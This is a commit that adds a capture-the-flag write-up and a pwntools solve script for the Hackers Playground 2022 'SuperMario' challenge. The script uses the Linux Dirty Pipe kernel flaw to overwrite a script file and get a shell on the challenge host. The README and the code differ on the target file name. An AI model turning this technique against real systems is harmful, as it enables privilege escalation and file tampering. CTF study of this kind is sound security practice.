Add hackers playground supermario

Author: sampritipanda

2022/Hackers-Playground-2022/SuperMario/README.md

@@ -0,0 +1,20 @@
+SuperMario
+----------
+
+The challenge name, and also looking at the binary, we can tell that this is referring to the Dirty Pipe vulnerability in the Linux Kernel.
+
+The challenge gives us the exact primitives we need:
+
+* Read from a Pipe
+* Write to a Pipe
+* Open a file in read only mode.
+
+We can just follow the steps in the original Dirty Pipe blog: https://dirtypipe.cm4all.com/
+
+We use the vulnerability to overwrite the init.sh file with our own commands and run it.
+
+This gives us a shell. However the flag is only readable by root.
+
+So we just use a generic dirty pipe exploit to escalate privileges to root and read the flag.
+
+The exploit can be found in `solve.py`.

2022/Hackers-Playground-2022/SuperMario/solve.py

@@ -0,0 +1,43 @@
+from pwn import *
+
+#proc = process(["runuser", "guest", "-c", "/home/guest/mario"])
+proc = remote('supermario.sstf.site', 34003)
+
+def read_pipe():
+    proc.sendlineafter(b"cmd>", b"1")
+    return proc.recv()
+    
+def write_pipe(size, data):
+    proc.sendlineafter(b"cmd>", b"2")
+    proc.sendlineafter(b"size?>", str(size).encode())
+    proc.recvuntil(b"input>")
+    proc.sendline(data)
+
+def write_file(path):
+    proc.sendlineafter(b"cmd>", b"3")
+    proc.sendlineafter(b"path>", path.encode())
+    print(proc.recvline())
+
+def read_file(path, size):
+    proc.sendlineafter(b"cmd>", b"4")
+    proc.sendlineafter(b"Path>", path.encode())
+    proc.sendlineafter(b"size?>", str(size).encode())
+    print(proc.recvline())
+
+
+pipe_size = 65536
+buffer_size = 4096
+
+for i in range(0, pipe_size, buffer_size):
+    write_pipe(buffer_size, b'A' * buffer_size)
+
+for i in range(0, pipe_size, buffer_size):
+    read_pipe()
+
+read_file('/home/guest/info.sh', 1)
+
+sice = "!/bin/sh\n/bin/bash\n"
+write_pipe(len(sice), sice.encode())
+
+proc.interactive()
+